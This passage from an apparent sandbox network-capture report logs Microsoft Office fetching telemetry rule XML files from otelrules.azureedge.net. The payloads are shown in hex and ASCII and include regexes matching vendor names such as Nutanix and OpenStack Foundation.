65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.4	49813	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:20 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:20 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:20 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: b6ecb1ee-501e-008f-3044-3c9054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193620Z-15b8b599d8885prmhC1TEBsnkw000000023g000000000wx6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:20 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.4	49812	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:20 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:20 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:20 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 77e83d57-401e-0016-5857-3c53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193620Z-15b8b599d88hd9g7hC1TEBp75c00000001r000000000r6va x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:20 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.4	49815	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:20 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:20 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:20 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 40c83c0a-001e-00ad-1e79-3b554b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193620Z-174c587ffdfb74xqhC1TEBhabc00000001x0000000009kbd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:20 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.4	49816	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:22 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:22 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:22 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: 7bd180c9-401e-008c-0e8c-3a86c2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193622Z-178bfbc474bw8bwphC1NYC38b4000000037000000000fzht x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:22 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.4	49817	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:22 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:23 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:22 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 907655e5-001e-0065-594b-3c0b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193622Z-15b8b599d8885prmhC1TEBsnkw00000001wg00000000ny4z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:23 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.4	49818	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:22 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:22 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:22 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: 1e280d2f-401e-0029-0d7f-3b9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193622Z-174c587ffdftjz9shC1TEBsh9800000001q000000000hwwn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:22 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.4	49819	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:22 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:22 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:22 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 5304f1e1-001e-005a-6c6b-3bc3d0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193622Z-178bfbc474b9xljthC1NYCtw9400000003ag00000000cge2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:22 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.4	49820	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:22 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:22 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:22 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 6b17e566-f01e-003f-7a44-3cd19d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193622Z-178bfbc474btvfdfhC1NYCa2en00000003e000000000hm2p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:22 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.4	49826	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:24 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:25 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:24 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: db5fa324-001e-00ad-2244-3c554b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193624Z-174c587ffdftv9hphC1TEBm29w00000001wg0000000028zp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:25 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.4	49824	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:24 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:25 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:25 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: cf2b2526-c01e-0082-5660-3baf72000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193625Z-178bfbc474bscnbchC1NYCe7eg00000003g000000000n4m9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:25 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.4	49827	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:24 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:25 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:25 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: c14060eb-d01e-007a-6e7d-3bf38c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193625Z-174c587ffdf59vqchC1TEByk6800000001zg00000000k338 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:25 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.4	49825	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:24 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:25 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:25 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 19a81fd9-501e-0078-66bc-3b06cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193625Z-15b8b599d889fz52hC1TEB59as00000001sg00000000ma6t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
